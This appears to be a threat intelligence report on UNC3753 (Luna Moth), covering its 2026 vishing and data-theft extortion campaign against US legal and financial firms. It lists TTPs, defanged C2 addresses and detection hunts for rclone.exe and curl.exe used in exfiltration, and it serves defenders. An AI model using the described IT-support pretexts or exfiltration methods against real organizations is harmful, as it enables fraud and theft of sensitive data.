Full Report
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States. UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands. Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.
Analysis Summary
# Threat Actor: UNC3753
## Attribution & Identity
* **Name:** UNC3753
* **Aliases:** Luna Moth, Chatty Spider, Silent Ransom Group
* **Known Associations:** Financially motivated cybercrime cluster characterized by data theft extortion without the traditional use of encrypting ransomware.
## Activity Summary
UNC3753 conducted an extensive data theft and extortion campaign from January through May 2026. The campaign involved highly interactive social engineering, utilizing vishing (voice phishing) to trick employees into providing remote access to corporate environments. The actor focuses on "callback phishing" where victims are lured into calling the attacker via fraudulent invoices or data migration notifications.
## Tactics, Techniques & Procedures
* **Vishing & Social Engineering:** Conducts phone conversations posing as IT support to build rapport and guide victims through compromise steps (**T1566.004**).
* **RMM Exploitation:** Persuades victims to install legitimate Remote Monitoring and Management (RMM) tools to gain persistent access (**T1219**).
* **Physical Infiltration:** In rare, notable instances, individuals posing as IT technicians have entered physical corporate offices to exfiltrate data via USB (**T1052.001**).
* **Defense Evasion:** Use of code signing (**T1553.002**), masquerading files as legitimate software (**T1036.005**), and clearing Event Logs (**T1070.001**).
* **Living-off-the-Land (LotL):** Heavy use of PowerShell (**T1059.001**), Windows Command Shell (**T1059.003**), and Rclone for data exfiltration to cloud storage (**T1567.002**).
* **Credential Theft:** Dumping LSASS memory and SAM databases to facilitate lateral movement (**T1003.001**, **T1003.002**).
## Targeting
* **Sectors:** Professional Services, Legal Services, and Financial Services.
* **Geography:** Primarily United States.
* **Victims:** Dozens of organizations; specifically targeted law firms and corporate offices of financial entities.
## Tools & Infrastructure
* **Malware/Utilities:** Rclone (for exfiltration), MSI installers, Curl (for secondary downloads), Screen-sharing/RMM software.
* **C2 & Infrastructure:**
* 192.236.147[.]131
* 192.236.147[.]138
* 193.141.60[.]212
* 192.236.154[.]158
* 192.236.146[.]173
* 174.169.162[.]62
* 64.94.84[.]97
* **Domain Patterns:** Frequent use of `-it[.]com` and `-helpdesk[.]com` suffixes for phishing and support pretexts.
## Implications
UNC3753 represents a shift toward more "human-centric" cyberattacks that bypass technical controls by exploiting trust. Their move toward physical office infiltration signals an escalation in risk, where digital threat intelligence must integrate with physical security protocols. The focus on extortion via data theft (rather than encryption) allows them to maintain a lower profile while still causing significant financial and reputational damage.
## Mitigations
* **Vishing Awareness:** Implement training specifically focusing on "callback phishing" and verifying IT support identities through official internal channels.
* **RMM Control:** Restrict the execution of unauthorized Remote Monitoring and Management tools. Use application allowlisting to block common RMM tools not used by the organization (e.g., AnyDesk, TeamViewer, Zoho Assist).
* **Physical Security:** Enhance visitor verification procedures and enforce "clean desk" policies to prevent unauthorized USB access to endpoints.
* **Monitoring:** Hunt for unusual use of `rclone.exe`, `curl.exe`, or the execution of MSI files from Temp directories. Monitor for unauthorized RDP or SSH connections moving laterally within the network.